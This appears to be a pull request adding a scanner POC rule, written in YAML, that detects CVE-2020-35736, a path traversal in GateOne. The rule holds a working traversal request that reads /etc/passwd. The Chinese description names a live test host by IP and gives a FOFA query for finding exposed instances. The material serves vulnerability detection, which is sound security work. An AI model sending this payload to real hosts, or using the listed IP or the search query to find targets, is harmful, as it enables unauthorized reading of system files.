### PR TITLE
CVE-2020-35736 GateOne 路径遍历漏洞

### DIFF
--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-gateone-cve-2020-35736
+rules:
+  - method: GET
+    path: "/auth?next=%2F"
+    follow_redirects: false
+    expression: response.status == 302
+  - method: GET
+    path: "/"
+    expression: response.status == 200 && "Gate One".bmatches(response.body)
+  - method: GET
+    path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.headers["Content-Type"].contains(string("text/html")) && "root:[x*]:0:0:".bmatches(response.body)
+
+detail:
+  author: tangshoupu
+  links:
+    https://github.com/liftoff/GateOne

--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     follow_redirects: true
     path: "/"
-    expression: response.status == 200 && "GateOne.init".bmatches(response.body)
+    expression: response.status == 200 && response.body.bcontains(b"GateOne.init") 
   - method: GET
     follow_redirects: false
     path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -3,12 +3,12 @@ rules:
   - method: GET
     follow_redirects: true
     path: "/"
-    expression: response.status == 200 && response.body.bcontains(b"GateOne.init")
+    expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"")
   - method: GET
     follow_redirects: false
     path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
     expression: |
-      response.status == 200 && response.headers["Content-Type"].contains(string("text/html")) && "root:[x*]:0:0:".bmatches(response.body) && "daemon:[x*]:1:1:".bmatches(response.body)
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
 detail:
   author: tangshoupu
   links:

--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -16,4 +16,4 @@ rules:
 detail:
   author: tangshoupu
   links:
-    https://github.com/liftoff/GateOne
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-35736

--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -3,7 +3,7 @@ rules:
   - method: GET
     follow_redirects: true
     path: "/"
-    expression: response.status == 200 && response.body.bcontains(b"GateOne.init") 
+    expression: response.status == 200 && response.body.bcontains(b"GateOne.init")
   - method: GET
     follow_redirects: false
     path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -1,18 +1,14 @@
 name: poc-yaml-gateone-cve-2020-35736
 rules:
   - method: GET
-    path: "/auth?next=%2F"
-    follow_redirects: false
-    expression: response.status == 302
-  - method: GET
-    path: "/"
-    expression: response.status == 200 && "Gate One".bmatches(response.body)
-  - method: GET
-    path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
     follow_redirects: true
+    path: "/"
+    expression: response.status == 200 && "GateOne.init".bmatches(response.body)
+  - method: GET
+    follow_redirects: false
+    path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
     expression: |
-      response.status == 200 && response.headers["Content-Type"].contains(string("text/html")) && "root:[x*]:0:0:".bmatches(response.body)
-
+      response.status == 200 && response.headers["Content-Type"].contains(string("text/html")) && "root:[x*]:0:0:".bmatches(response.body) && "daemon:[x*]:1:1:".bmatches(response.body)
 detail:
   author: tangshoupu
   links:


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE-2020-35736 GateOne 路径遍历漏洞
## 测试环境
测试环境：http://103.75.188.147:10443
## 备注
### fofa语法：app="GateOne"
![image](https://user-images.githubusercontent.com/50769953/119814766-4d106480-beda-11eb-8e21-a695dfeacc61.png)